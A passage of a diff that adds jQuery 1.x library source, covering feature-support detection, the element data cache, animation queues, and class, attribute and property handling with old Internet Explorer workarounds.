+			marginDiv.style.marginRight = marginDiv.style.width = "0";
+			div.style.width = "1px";
+
+			support.reliableMarginRight =
+				!parseFloat( ( window.getComputedStyle( marginDiv, null ) || {} ).marginRight );
+		}
+
+		if ( typeof div.style.zoom !== core_strundefined ) {
+			// Support: IE<8
+			// Check if natively block-level elements act like inline-block
+			// elements when setting their display to 'inline' and giving
+			// them layout
+			div.innerHTML = "";
+			div.style.cssText = divReset + "width:1px;padding:1px;display:inline;zoom:1";
+			support.inlineBlockNeedsLayout = ( div.offsetWidth === 3 );
+
+			// Support: IE6
+			// Check if elements with layout shrink-wrap their children
+			div.style.display = "block";
+			div.innerHTML = "<div></div>";
+			div.firstChild.style.width = "5px";
+			support.shrinkWrapBlocks = ( div.offsetWidth !== 3 );
+
+			if ( support.inlineBlockNeedsLayout ) {
+				// Prevent IE 6 from affecting layout for positioned elements #11048
+				// Prevent IE from shrinking the body in IE 7 mode #12869
+				// Support: IE<8
+				body.style.zoom = 1;
+			}
+		}
+
+		body.removeChild( container );
+
+		// Null elements to avoid leaks in IE
+		container = div = tds = marginDiv = null;
+	});
+
+	// Null elements to avoid leaks in IE
+	all = select = fragment = opt = a = input = null;
+
+	return support;
+})({});
+
+var rbrace = /(?:\{[\s\S]*\}|\[[\s\S]*\])$/,
+	rmultiDash = /([A-Z])/g;
+
+function internalData( elem, name, data, pvt /* Internal Use Only */ ){
+	if ( !jQuery.acceptData( elem ) ) {
+		return;
+	}
+
+	var ret, thisCache,
+		internalKey = jQuery.expando,
+
+		// We have to handle DOM nodes and JS objects differently because IE6-7
+		// can't GC object references properly across the DOM-JS boundary
+		isNode = elem.nodeType,
+
+		// Only DOM nodes need the global jQuery cache; JS object data is
+		// attached directly to the object so GC can occur automatically
+		cache = isNode ? jQuery.cache : elem,
+
+		// Only defining an ID for JS objects if its cache already exists allows
+		// the code to shortcut on the same path as a DOM node with no cache
+		id = isNode ? elem[ internalKey ] : elem[ internalKey ] && internalKey;
+
+	// Avoid doing any more work than we need to when trying to get data on an
+	// object that has no data at all
+	if ( (!id || !cache[id] || (!pvt && !cache[id].data)) && data === undefined && typeof name === "string" ) {
+		return;
+	}
+
+	if ( !id ) {
+		// Only DOM nodes need a new unique ID for each element since their data
+		// ends up in the global cache
+		if ( isNode ) {
+			id = elem[ internalKey ] = core_deletedIds.pop() || jQuery.guid++;
+		} else {
+			id = internalKey;
+		}
+	}
+
+	if ( !cache[ id ] ) {
+		// Avoid exposing jQuery metadata on plain JS objects when the object
+		// is serialized using JSON.stringify
+		cache[ id ] = isNode ? {} : { toJSON: jQuery.noop };
+	}
+
+	// An object can be passed to jQuery.data instead of a key/value pair; this gets
+	// shallow copied over onto the existing cache
+	if ( typeof name === "object" || typeof name === "function" ) {
+		if ( pvt ) {
+			cache[ id ] = jQuery.extend( cache[ id ], name );
+		} else {
+			cache[ id ].data = jQuery.extend( cache[ id ].data, name );
+		}
+	}
+
+	thisCache = cache[ id ];
+
+	// jQuery data() is stored in a separate object inside the object's internal data
+	// cache in order to avoid key collisions between internal data and user-defined
+	// data.
+	if ( !pvt ) {
+		if ( !thisCache.data ) {
+			thisCache.data = {};
+		}
+
+		thisCache = thisCache.data;
+	}
+
+	if ( data !== undefined ) {
+		thisCache[ jQuery.camelCase( name ) ] = data;
+	}
+
+	// Check for both converted-to-camel and non-converted data property names
+	// If a data property was specified
+	if ( typeof name === "string" ) {
+
+		// First Try to find as-is property data
+		ret = thisCache[ name ];
+
+		// Test for null|undefined property data
+		if ( ret == null ) {
+
+			// Try to find the camelCased property
+			ret = thisCache[ jQuery.camelCase( name ) ];
+		}
+	} else {
+		ret = thisCache;
+	}
+
+	return ret;
+}
+
+function internalRemoveData( elem, name, pvt ) {
+	if ( !jQuery.acceptData( elem ) ) {
+		return;
+	}
+
+	var thisCache, i,
+		isNode = elem.nodeType,
+
+		// See jQuery.data for more information
+		cache = isNode ? jQuery.cache : elem,
+		id = isNode ? elem[ jQuery.expando ] : jQuery.expando;
+
+	// If there is already no cache entry for this object, there is no
+	// purpose in continuing
+	if ( !cache[ id ] ) {
+		return;
+	}
+
+	if ( name ) {
+
+		thisCache = pvt ? cache[ id ] : cache[ id ].data;
+
+		if ( thisCache ) {
+
+			// Support array or space separated string names for data keys
+			if ( !jQuery.isArray( name ) ) {
+
+				// try the string as a key before any manipulation
+				if ( name in thisCache ) {
+					name = [ name ];
+				} else {
+
+					// split the camel cased version by spaces unless a key with the spaces exists
+					name = jQuery.camelCase( name );
+					if ( name in thisCache ) {
+						name = [ name ];
+					} else {
+						name = name.split(" ");
+					}
+				}
+			} else {
+				// If "name" is an array of keys...
+				// When data is initially created, via ("key", "val") signature,
+				// keys will be converted to camelCase.
+				// Since there is no way to tell _how_ a key was added, remove
+				// both plain key and camelCase key. #12786
+				// This will only penalize the array argument path.
+				name = name.concat( jQuery.map( name, jQuery.camelCase ) );
+			}
+
+			i = name.length;
+			while ( i-- ) {
+				delete thisCache[ name[i] ];
+			}
+
+			// If there is no data left in the cache, we want to continue
+			// and let the cache object itself get destroyed
+			if ( pvt ? !isEmptyDataObject(thisCache) : !jQuery.isEmptyObject(thisCache) ) {
+				return;
+			}
+		}
+	}
+
+	// See jQuery.data for more information
+	if ( !pvt ) {
+		delete cache[ id ].data;
+
+		// Don't destroy the parent cache unless the internal data object
+		// had been the only thing left in it
+		if ( !isEmptyDataObject( cache[ id ] ) ) {
+			return;
+		}
+	}
+
+	// Destroy the cache
+	if ( isNode ) {
+		jQuery.cleanData( [ elem ], true );
+
+	// Use delete when supported for expandos or `cache` is not a window per isWindow (#10080)
+	/* jshint eqeqeq: false */
+	} else if ( jQuery.support.deleteExpando || cache != cache.window ) {
+		/* jshint eqeqeq: true */
+		delete cache[ id ];
+
+	// When all else fails, null
+	} else {
+		cache[ id ] = null;
+	}
+}
+
+jQuery.extend({
+	cache: {},
+
+	// The following elements throw uncatchable exceptions if you
+	// attempt to add expando properties to them.
+	noData: {
+		"applet": true,
+		"embed": true,
+		// Ban all objects except for Flash (which handle expandos)
+		"object": "clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
+	},
+
+	hasData: function( elem ) {
+		elem = elem.nodeType ? jQuery.cache[ elem[jQuery.expando] ] : elem[ jQuery.expando ];
+		return !!elem && !isEmptyDataObject( elem );
+	},
+
+	data: function( elem, name, data ) {
+		return internalData( elem, name, data );
+	},
+
+	removeData: function( elem, name ) {
+		return internalRemoveData( elem, name );
+	},
+
+	// For internal use only.
+	_data: function( elem, name, data ) {
+		return internalData( elem, name, data, true );
+	},
+
+	_removeData: function( elem, name ) {
+		return internalRemoveData( elem, name, true );
+	},
+
+	// A method for determining if a DOM node can handle the data expando
+	acceptData: function( elem ) {
+		// Do not set data on non-element because it will not be cleared (#8335).
+		if ( elem.nodeType && elem.nodeType !== 1 && elem.nodeType !== 9 ) {
+			return false;
+		}
+
+		var noData = elem.nodeName && jQuery.noData[ elem.nodeName.toLowerCase() ];
+
+		// nodes accept data unless otherwise specified; rejection can be conditional
+		return !noData || noData !== true && elem.getAttribute("classid") === noData;
+	}
+});
+
+jQuery.fn.extend({
+	data: function( key, value ) {
+		var attrs, name,
+			data = null,
+			i = 0,
+			elem = this[0];
+
+		// Special expections of .data basically thwart jQuery.access,
+		// so implement the relevant behavior ourselves
+
+		// Gets all values
+		if ( key === undefined ) {
+			if ( this.length ) {
+				data = jQuery.data( elem );
+
+				if ( elem.nodeType === 1 && !jQuery._data( elem, "parsedAttrs" ) ) {
+					attrs = elem.attributes;
+					for ( ; i < attrs.length; i++ ) {
+						name = attrs[i].name;
+
+						if ( name.indexOf("data-") === 0 ) {
+							name = jQuery.camelCase( name.slice(5) );
+
+							dataAttr( elem, name, data[ name ] );
+						}
+					}
+					jQuery._data( elem, "parsedAttrs", true );
+				}
+			}
+
+			return data;
+		}
+
+		// Sets multiple values
+		if ( typeof key === "object" ) {
+			return this.each(function() {
+				jQuery.data( this, key );
+			});
+		}
+
+		return arguments.length > 1 ?
+
+			// Sets one value
+			this.each(function() {
+				jQuery.data( this, key, value );
+			}) :
+
+			// Gets one value
+			// Try to fetch any internally stored data first
+			elem ? dataAttr( elem, key, jQuery.data( elem, key ) ) : null;
+	},
+
+	removeData: function( key ) {
+		return this.each(function() {
+			jQuery.removeData( this, key );
+		});
+	}
+});
+
+function dataAttr( elem, key, data ) {
+	// If nothing was found internally, try to fetch any
+	// data from the HTML5 data-* attribute
+	if ( data === undefined && elem.nodeType === 1 ) {
+
+		var name = "data-" + key.replace( rmultiDash, "-$1" ).toLowerCase();
+
+		data = elem.getAttribute( name );
+
+		if ( typeof data === "string" ) {
+			try {
+				data = data === "true" ? true :
+					data === "false" ? false :
+					data === "null" ? null :
+					// Only convert to a number if it doesn't change the string
+					+data + "" === data ? +data :
+					rbrace.test( data ) ? jQuery.parseJSON( data ) :
+						data;
+			} catch( e ) {}
+
+			// Make sure we set the data so it isn't changed later
+			jQuery.data( elem, key, data );
+
+		} else {
+			data = undefined;
+		}
+	}
+
+	return data;
+}
+
+// checks a cache object for emptiness
+function isEmptyDataObject( obj ) {
+	var name;
+	for ( name in obj ) {
+
+		// if the public data object is empty, the private is still empty
+		if ( name === "data" && jQuery.isEmptyObject( obj[name] ) ) {
+			continue;
+		}
+		if ( name !== "toJSON" ) {
+			return false;
+		}
+	}
+
+	return true;
+}
+jQuery.extend({
+	queue: function( elem, type, data ) {
+		var queue;
+
+		if ( elem ) {
+			type = ( type || "fx" ) + "queue";
+			queue = jQuery._data( elem, type );
+
+			// Speed up dequeue by getting out quickly if this is just a lookup
+			if ( data ) {
+				if ( !queue || jQuery.isArray(data) ) {
+					queue = jQuery._data( elem, type, jQuery.makeArray(data) );
+				} else {
+					queue.push( data );
+				}
+			}
+			return queue || [];
+		}
+	},
+
+	dequeue: function( elem, type ) {
+		type = type || "fx";
+
+		var queue = jQuery.queue( elem, type ),
+			startLength = queue.length,
+			fn = queue.shift(),
+			hooks = jQuery._queueHooks( elem, type ),
+			next = function() {
+				jQuery.dequeue( elem, type );
+			};
+
+		// If the fx queue is dequeued, always remove the progress sentinel
+		if ( fn === "inprogress" ) {
+			fn = queue.shift();
+			startLength--;
+		}
+
+		if ( fn ) {
+
+			// Add a progress sentinel to prevent the fx queue from being
+			// automatically dequeued
+			if ( type === "fx" ) {
+				queue.unshift( "inprogress" );
+			}
+
+			// clear up the last queue stop function
+			delete hooks.stop;
+			fn.call( elem, next, hooks );
+		}
+
+		if ( !startLength && hooks ) {
+			hooks.empty.fire();
+		}
+	},
+
+	// not intended for public consumption - generates a queueHooks object, or returns the current one
+	_queueHooks: function( elem, type ) {
+		var key = type + "queueHooks";
+		return jQuery._data( elem, key ) || jQuery._data( elem, key, {
+			empty: jQuery.Callbacks("once memory").add(function() {
+				jQuery._removeData( elem, type + "queue" );
+				jQuery._removeData( elem, key );
+			})
+		});
+	}
+});
+
+jQuery.fn.extend({
+	queue: function( type, data ) {
+		var setter = 2;
+
+		if ( typeof type !== "string" ) {
+			data = type;
+			type = "fx";
+			setter--;
+		}
+
+		if ( arguments.length < setter ) {
+			return jQuery.queue( this[0], type );
+		}
+
+		return data === undefined ?
+			this :
+			this.each(function() {
+				var queue = jQuery.queue( this, type, data );
+
+				// ensure a hooks for this queue
+				jQuery._queueHooks( this, type );
+
+				if ( type === "fx" && queue[0] !== "inprogress" ) {
+					jQuery.dequeue( this, type );
+				}
+			});
+	},
+	dequeue: function( type ) {
+		return this.each(function() {
+			jQuery.dequeue( this, type );
+		});
+	},
+	// Based off of the plugin by Clint Helfers, with permission.
+	// http://blindsignals.com/index.php/2009/07/jquery-delay/
+	delay: function( time, type ) {
+		time = jQuery.fx ? jQuery.fx.speeds[ time ] || time : time;
+		type = type || "fx";
+
+		return this.queue( type, function( next, hooks ) {
+			var timeout = setTimeout( next, time );
+			hooks.stop = function() {
+				clearTimeout( timeout );
+			};
+		});
+	},
+	clearQueue: function( type ) {
+		return this.queue( type || "fx", [] );
+	},
+	// Get a promise resolved when queues of a certain type
+	// are emptied (fx is the type by default)
+	promise: function( type, obj ) {
+		var tmp,
+			count = 1,
+			defer = jQuery.Deferred(),
+			elements = this,
+			i = this.length,
+			resolve = function() {
+				if ( !( --count ) ) {
+					defer.resolveWith( elements, [ elements ] );
+				}
+			};
+
+		if ( typeof type !== "string" ) {
+			obj = type;
+			type = undefined;
+		}
+		type = type || "fx";
+
+		while( i-- ) {
+			tmp = jQuery._data( elements[ i ], type + "queueHooks" );
+			if ( tmp && tmp.empty ) {
+				count++;
+				tmp.empty.add( resolve );
+			}
+		}
+		resolve();
+		return defer.promise( obj );
+	}
+});
+var nodeHook, boolHook,
+	rclass = /[\t\r\n\f]/g,
+	rreturn = /\r/g,
+	rfocusable = /^(?:input|select|textarea|button|object)$/i,
+	rclickable = /^(?:a|area)$/i,
+	ruseDefault = /^(?:checked|selected)$/i,
+	getSetAttribute = jQuery.support.getSetAttribute,
+	getSetInput = jQuery.support.input;
+
+jQuery.fn.extend({
+	attr: function( name, value ) {
+		return jQuery.access( this, jQuery.attr, name, value, arguments.length > 1 );
+	},
+
+	removeAttr: function( name ) {
+		return this.each(function() {
+			jQuery.removeAttr( this, name );
+		});
+	},
+
+	prop: function( name, value ) {
+		return jQuery.access( this, jQuery.prop, name, value, arguments.length > 1 );
+	},
+
+	removeProp: function( name ) {
+		name = jQuery.propFix[ name ] || name;
+		return this.each(function() {
+			// try/catch handles cases where IE balks (such as removing a property on window)
+			try {
+				this[ name ] = undefined;
+				delete this[ name ];
+			} catch( e ) {}
+		});
+	},
+
+	addClass: function( value ) {
+		var classes, elem, cur, clazz, j,
+			i = 0,
+			len = this.length,
+			proceed = typeof value === "string" && value;
+
+		if ( jQuery.isFunction( value ) ) {
+			return this.each(function( j ) {
+				jQuery( this ).addClass( value.call( this, j, this.className ) );
+			});
+		}
+
+		if ( proceed ) {
+			// The disjunction here is for better compressibility (see removeClass)
+			classes = ( value || "" ).match( core_rnotwhite ) || [];
+
+			for ( ; i < len; i++ ) {
+				elem = this[ i ];
+				cur = elem.nodeType === 1 && ( elem.className ?
+					( " " + elem.className + " " ).replace( rclass, " " ) :
+					" "
+				);
+
+				if ( cur ) {
+					j = 0;
+					while ( (clazz = classes[j++]) ) {
+						if ( cur.indexOf( " " + clazz + " " ) < 0 ) {
+							cur += clazz + " ";
+						}
+					}
+					elem.className = jQuery.trim( cur );
+
+				}
+			}
+		}
+
+		return this;
+	},
+
+	removeClass: function( value ) {
+		var classes, elem, cur, clazz, j,
+			i = 0,
+			len = this.length,
+			proceed = arguments.length === 0 || typeof value === "string" && value;
+
+		if ( jQuery.isFunction( value ) ) {
+			return this.each(function( j ) {
+				jQuery( this ).removeClass( value.call( this, j, this.className ) );
+			});
+		}
+		if ( proceed ) {
+			classes = ( value || "" ).match( core_rnotwhite ) || [];
+
+			for ( ; i < len; i++ ) {
+				elem = this[ i ];
+				// This expression is here for better compressibility (see addClass)
+				cur = elem.nodeType === 1 && ( elem.className ?
+					( " " + elem.className + " " ).replace( rclass, " " ) :
+					""
+				);
+
+				if ( cur ) {
+					j = 0;
+					while ( (clazz = classes[j++]) ) {
+						// Remove *all* instances
+						while ( cur.indexOf( " " + clazz + " " ) >= 0 ) {
+							cur = cur.replace( " " + clazz + " ", " " );
+						}
+					}
+					elem.className = value ? jQuery.trim( cur ) : "";
+				}
+			}
+		}
+
+		return this;
+	},
+
+	toggleClass: function( value, stateVal ) {
+		var type = typeof value;
+
+		if ( typeof stateVal === "boolean" && type === "string" ) {
+			return stateVal ? this.addClass( value ) : this.removeClass( value );
+		}
+
+		if ( jQuery.isFunction( value ) ) {
+			return this.each(function( i ) {
+				jQuery( this ).toggleClass( value.call(this, i, this.className, stateVal), stateVal );
+			});
+		}
+
+		return this.each(function() {
+			if ( type === "string" ) {
+				// toggle individual class names
+				var className,
+					i = 0,
+					self = jQuery( this ),
+					classNames = value.match( core_rnotwhite ) || [];
+
+				while ( (className = classNames[ i++ ]) ) {
+					// check each className given, space separated list
+					if ( self.hasClass( className ) ) {
+						self.removeClass( className );
+					} else {
+						self.addClass( className );
+					}
+				}
+
+			// Toggle whole class name
+			} else if ( type === core_strundefined || type === "boolean" ) {
+				if ( this.className ) {
+					// store className if set
+					jQuery._data( this, "__className__", this.className );
+				}
+
+				// If the element has a class name or if we're passed "false",
+				// then remove the whole classname (if there was one, the above saved it).
+				// Otherwise bring back whatever was previously saved (if anything),
+				// falling back to the empty string if nothing was stored.
+				this.className = this.className || value === false ? "" : jQuery._data( this, "__className__" ) || "";
+			}
+		});
+	},
+
+	hasClass: function( selector ) {
+		var className = " " + selector + " ",
+			i = 0,
+			l = this.length;
+		for ( ; i < l; i++ ) {
+			if ( this[i].nodeType === 1 && (" " + this[i].className + " ").replace(rclass, " ").indexOf( className ) >= 0 ) {
+				return true;
+			}
+		}
+
+		return false;
+	},
+
+	val: function( value ) {
+		var ret, hooks, isFunction,
+			elem = this[0];
+
+		if ( !arguments.length ) {
+			if ( elem ) {
+				hooks = jQuery.valHooks[ elem.type ] || jQuery.valHooks[ elem.nodeName.toLowerCase() ];
+
+				if ( hooks && "get" in hooks && (ret = hooks.get( elem, "value" )) !== undefined ) {
+					return ret;
+				}
+
+				ret = elem.value;
+
+				return typeof ret === "string" ?
+					// handle most common string cases
+					ret.replace(rreturn, "") :
+					// handle cases where value is null/undef or number
+					ret == null ? "" : ret;
+			}
+
+			return;
+		}
+
+		isFunction = jQuery.isFunction( value );
+
+		return this.each(function( i ) {
+			var val;
+
+			if ( this.nodeType !== 1 ) {
+				return;
+			}
+
+			if ( isFunction ) {
+				val = value.call( this, i, jQuery( this ).val() );
+			} else {
+				val = value;
+			}
+
+			// Treat null/undefined as ""; convert numbers to string
+			if ( val == null ) {
+				val = "";
+			} else if ( typeof val === "number" ) {
+				val += "";
+			} else if ( jQuery.isArray( val ) ) {
+				val = jQuery.map(val, function ( value ) {
+					return value == null ? "" : value + "";
+				});
+			}
+
+			hooks = jQuery.valHooks[ this.type ] || jQuery.valHooks[ this.nodeName.toLowerCase() ];
+
+			// If set returns undefined, fall back to normal setting
+			if ( !hooks || !("set" in hooks) || hooks.set( this, val, "value" ) === undefined ) {
+				this.value = val;
+			}
+		});
+	}
+});
+
+jQuery.extend({
+	valHooks: {
+		option: {
+			get: function( elem ) {
+				// Use proper attribute retrieval(#6932, #12072)
+				var val = jQuery.find.attr( elem, "value" );
+				return val != null ?
+					val :
+					elem.text;
+			}
+		},
+		select: {
+			get: function( elem ) {
+				var value, option,
+					options = elem.options,
+					index = elem.selectedIndex,
+					one = elem.type === "select-one" || index < 0,
+					values = one ? null : [],
+					max = one ? index + 1 : options.length,
+					i = index < 0 ?
+						max :
+						one ? index : 0;
+
+				// Loop through all the selected options
+				for ( ; i < max; i++ ) {
+					option = options[ i ];
+
+					// oldIE doesn't update selected after form reset (#2551)
+					if ( ( option.selected || i === index ) &&
+							// Don't return options that are disabled or in a disabled optgroup
+							( jQuery.support.optDisabled ? !option.disabled : option.getAttribute("disabled") === null ) &&
+							( !option.parentNode.disabled || !jQuery.nodeName( option.parentNode, "optgroup" ) ) ) {
+
+						// Get the specific value for the option
+						value = jQuery( option ).val();
+
+						// We don't need an array for one selects
+						if ( one ) {
+							return value;
+						}
+
+						// Multi-Selects return an array
+						values.push( value );
+					}
+				}
+
+				return values;
+			},
+
+			set: function( elem, value ) {
+				var optionSet, option,
+					options = elem.options,
+					values = jQuery.makeArray( value ),
+					i = options.length;
+
+				while ( i-- ) {
+					option = options[ i ];
+					if ( (option.selected = jQuery.inArray( jQuery(option).val(), values ) >= 0) ) {
+						optionSet = true;
+					}
+				}
+
+				// force browsers to behave consistently when non-matching value is set
+				if ( !optionSet ) {
+					elem.selectedIndex = -1;
+				}
+				return values;
+			}
+		}
+	},
+
+	attr: function( elem, name, value ) {
+		var hooks, ret,
+			nType = elem.nodeType;
+
+		// don't get/set attributes on text, comment and attribute nodes
+		if ( !elem || nType === 3 || nType === 8 || nType === 2 ) {
+			return;
+		}
+
+		// Fallback to prop when attributes are not supported
+		if ( typeof elem.getAttribute === core_strundefined ) {
+			return jQuery.prop( elem, name, value );
+		}
+
+		// All attributes are lowercase
+		// Grab necessary hook if one is defined
+		if ( nType !== 1 || !jQuery.isXMLDoc( elem ) ) {
+			name = name.toLowerCase();
+			hooks = jQuery.attrHooks[ name ] ||
+				( jQuery.expr.match.bool.test( name ) ? boolHook : nodeHook );
+		}
+
+		if ( value !== undefined ) {
+
+			if ( value === null ) {
+				jQuery.removeAttr( elem, name );
+
+			} else if ( hooks && "set" in hooks && (ret = hooks.set( elem, value, name )) !== undefined ) {
+				return ret;
+
+			} else {
+				elem.setAttribute( name, value + "" );
+				return value;
+			}
+
+		} else if ( hooks && "get" in hooks && (ret = hooks.get( elem, name )) !== null ) {
+			return ret;
+
+		} else {
+			ret = jQuery.find.attr( elem, name );
+
+			// Non-existent attributes return null, we normalize to undefined
+			return ret == null ?
+				undefined :
+				ret;
+		}
+	},
+
+	removeAttr: function( elem, value ) {
+		var name, propName,
+			i = 0,
+			attrNames = value && value.match( core_rnotwhite );
+
+		if ( attrNames && elem.nodeType === 1 ) {
+			while ( (name = attrNames[i++]) ) {
+				propName = jQuery.propFix[ name ] || name;
+
+				// Boolean attributes get special treatment (#10870)
+				if ( jQuery.expr.match.bool.test( name ) ) {
+					// Set corresponding property to false
+					if ( getSetInput && getSetAttribute || !ruseDefault.test( name ) ) {
+						elem[ propName ] = false;
+					// Support: IE<9
+					// Also clear defaultChecked/defaultSelected (if appropriate)
+					} else {
+						elem[ jQuery.camelCase( "default-" + name ) ] =
+							elem[ propName ] = false;
+					}
+
+				// See #9699 for explanation of this approach (setting first, then removal)
+				} else {
+					jQuery.attr( elem, name, "" );
+				}
+
+				elem.removeAttribute( getSetAttribute ? name : propName );
+			}
+		}
+	},
+
+	attrHooks: {
+		type: {
+			set: function( elem, value ) {
+				if ( !jQuery.support.radioValue && value === "radio" && jQuery.nodeName(elem, "input") ) {
+					// Setting the type on a radio button after the value resets the value in IE6-9
+					// Reset value to default in case type is set after value during creation
+					var val = elem.value;
+					elem.setAttribute( "type", value );
+					if ( val ) {
+						elem.value = val;
+					}
+					return value;
+				}
+			}
+		}
+	},
+
+	propFix: {
+		"for": "htmlFor",
+		"class": "className"
+	},
+
+	prop: function( elem, name, value ) {
+		var ret, hooks, notxml,
+			nType = elem.nodeType;
+
+		// don't get/set properties on text, comment and attribute nodes
+		if ( !elem || nType === 3 || nType === 8 || nType === 2 ) {
+			return;
+		}
+
+		notxml = nType !== 1 || !jQuery.isXMLDoc( elem );
+
+		if ( notxml ) {
+			// Fix name and attach hooks
+			name = jQuery.propFix[ name ] || name;
+			hooks = jQuery.propHooks[ name ];
+		}
+
+		if ( value !== undefined ) {
+			return hooks && "set" in hooks && (ret = hooks.set( elem, value, name )) !== undefined ?
+				ret :
+				( elem[ name ] = value );
+
+		} else {
+			return hooks && "get" in hooks && (ret = hooks.get( elem, name )) !== null ?
+				ret :
+				elem[ name ];
+		}
+	},
+
+	propHooks: {
+		tabIndex: {
+			get: function( elem ) {
+				// elem.tabIndex doesn't always return the correct value when it hasn't been explicitly set
+				// http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript/
+				// Use proper attribute retrieval(#12072)
+				var tabindex = jQuery.find.attr( elem, "tabindex" );
+
+				return tabindex ?
+					parseInt( tabindex, 10 ) :
+					rfocusable.test( elem.nodeName ) || rclickable.test( elem.nodeName ) && elem.href ?
+						0 :
+						-1;
+			}
+		}
+	}
+});
+
+// Hooks for boolean attributes
+boolHook = {
+	set: function( elem, value, name ) {
+		if ( value === false ) {
+			// Remove boolean attributes when set to false
+			jQuery.removeAttr( elem, name );
+		} else if ( getSetInput && getSetAttribute || !ruseDefault.test( name ) ) {
+			// IE<8 needs the *property* name
+			elem.setAttribute( !getSetAttribute && jQuery.propFix[ name ] || name, name );
+
+		// Use defaultChecked and defaultSelected for oldIE
+		} else {
+			elem[ jQuery.camelCase( "default-" + name ) ] = elem[ name ] = true;
+		}
+
+		return name;
+	}
+};
+jQuery.each( jQuery.expr.match.bool.source.match( /\w+/g ), function( i, name ) {
+	var getter = jQuery.expr.attrHandle[ name ] || jQuery.find.attr;
+
+	jQuery.expr.attrHandle[ name ] = getSetInput && getSetAttribute || !ruseDefault.test( name ) ?
+		function( elem, name, isXML ) {
+			var fn = jQuery.expr.attrHandle[ name ],
+				ret = isXML ?
+					undefined :
+					/* jshint eqeqeq: false */
+					(jQuery.expr.attrHandle[ name ] = undefined) !=
+						getter( elem, name, isXML ) ?
+
+						name.toLowerCase() :
+						null;
+			jQuery.expr.attrHandle[ name ] = fn;
+			return ret;
+		} :
+		function( elem, name, isXML ) {
+			return isXML ?
+				undefined :
+				elem[ jQuery.camelCase( "default-" + name ) ] ?
+					name.toLowerCase() :
+					null;
+		};
+});
+
+// fix oldIE attroperties
+if ( !getSetInput || !getSetAttribute ) {
+	jQuery.attrHooks.value = {
+		set: function( elem, value, name ) {
+			if ( jQuery.nodeName( elem, "input" ) ) {
+				// Does not return so that setAttribute is also used
+				elem.defaultValue = value;
+			} else {
+				// Use nodeHook if defined (#1954); otherwise setAttribute is fine
+				return nodeHook && nodeHook.set( elem, value, name );
+			}
+		}
+	};
+}
+
+// IE6/7 do not support getting/setting some attributes with get/setAttribute
+if ( !getSetAttribute ) {
+
+	// Use this for any attribute in IE6/7
+	// This fixes almost every IE6/7 issue
+	nodeHook = {
+		set: function( elem, value, name ) {
+			// Set the existing or create a new attribute node
+			var ret = elem.getAttributeNode( name );
+			if ( !ret ) {
+				elem.setAttributeNode(
+					(ret = elem.ownerDocument.createAttribute( name ))
+				);
+			}
+
+			ret.value = value += "";
+
+			// Break association with cloned elements by also using setAttribute (#9646)
+			return name === "value" || value === elem.getAttribute( name ) ?
+				value :
+				undefined;
+		}
+	};
+	jQuery.expr.attrHandle.id = jQuery.expr.attrHandle.name = jQuery.expr.attrHandle.coords =
+		// Some attributes are constructed with empty-string values when not defined
+		function( elem, name, isXML ) {
+			var ret;
+			return isXML ?
+				undefined :
+				(ret = elem.getAttributeNode( name )) && ret.value !== "" ?
+					ret.value :
+					null;
+		};
+	jQuery.valHooks.button = {
+		get: function( elem, name ) {
+			var ret = elem.getAttributeNode( name );
+			return ret && ret.specified ?
+				ret.value :
+				undefined;
+		},
+		set: nodeHook.set
+	};
+
+	// Set contenteditable to false on removals(#10429)
+	// Setting to empty string throws an error as an invalid value
+	jQuery.attrHooks.contenteditable = {
+		set: function( elem, value, name ) {
+			nodeHook.set( elem, value === "" ? false : value, name );
+		}
+	};
+
+	// Set width and height to auto instead of 0 on empty string( Bug #8150 )
+	// This is for removals
+	jQuery.each([ "width", "height" ], function( i, name ) {
+		jQuery.attrHooks[ name ] = {
+			set: function( elem, value ) {
+				if ( value === "" ) {
+					elem.setAttribute( name, "auto" );
+					return value;
+				}
+			}
+		};
+	});
+}
+
+
+// Some attributes require a special call on IE
+// http://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx
+if ( !jQuery.support.hrefNormalized ) {
+	// href/src property should get the full normalized URL (#10299/#12915)
+	jQuery.each([ "href", "src" ], function( i, name ) {
+		jQuery.propHooks[ name ] = {
+			get: function( elem ) {
+				return elem.getAttribute( name, 4 );
+			}
+		};
+	});
+}
+
+if ( !jQuery.support.style ) {
+	jQuery.attrHooks.style = {
+		get: function( elem ) {
+			// Return undefined in the case of empty string
+			// Note: IE uppercases css property names, but if we were to .toLowerCase()
+			// .cssText, that would destroy case senstitivity in URL's, like in "background"
+			return elem.style.cssText || undefined;
+		},
+		set: function( elem, value ) {
+			return ( elem.style.cssText = value + "" );
+		}
+	};
+}
+
+// Safari mis-reports the default selected property of an option
+// Accessing the parent's selectedIndex property fixes it
+if ( !jQuery.support.optSelected ) {
+	jQuery.propHooks.selected = {
+		get: function( elem ) {
+			var parent = elem.parentNode;
+
+			if ( parent ) {
+				parent.selectedIndex;
+
+				// Make sure that it also works with optgroups, see #5701
+				if ( parent.parentNode ) {
+					parent.parentNode.selectedIndex;
+				}
+			}
+			return null;
+		}
+	};
+}
+
+jQuery.each([
+	"tabIndex",
+	"readOnly",
+	"maxLength",
+	"cellSpacing",
+	"cellPadding",
+	"rowSpan",
+	"colSpan",
+	"useMap",
+	"frameBorder",
+	"contentEditable"
+], function() {
+	jQuery.propFix[ this.toLowerCase() ] = this;
+});
+
+// IE6/7 call enctype encoding
+if ( !jQuery.support.enctype ) {
+	jQuery.propFix.enctype = "encoding";
+}
+
+// Radios and checkboxes getter/setter
+jQuery.each([ "radio", "checkbox" ], function() {
+	jQuery.valHooks[ this ] = {
+		set: function( elem, value ) {
+			if ( jQuery.isArray( value ) ) {
+				return ( elem.checked = jQuery.inArray( jQuery(elem).val(), value ) >= 0 );
+			}
+		}
+	};
+	if ( !jQuery.support.checkOn ) {
+		jQuery.valHooks[ this ].get = function( elem ) {
+			// Support: Webkit
+			// "" is returned instead of "on" if a value isn't specified
+			return elem.getAttribute("value") === null ? "on" : elem.value;
+		};
+	}
+});
+var rformElems = /^(?:input|select|textarea)$/i,
+	rkeyEvent = /^key/,
+	rmouseEvent = /^(?:mouse|contextmenu)|click/,
+	rfocusMorph = /^(?:focusinfocus|focusoutblur)$/,
+	rtypenamespace = /^([^.]*)(?:\.(.+)|)$/;
+
+function returnTrue() {
+	return true;
+}
+
+function returnFalse() {
+	return false;
+}
+
+function safeActiveElement() {
+	try {
+		return document.activeElement;
+	} catch ( err ) { }
+}
+
+/*
+ * Helper functions for managing events -- not part of the public interface.
+ * Props to Dean Edwards' addEvent library for many of the ideas.
+ */
+jQuery.event = {
+
+	global: {},
+
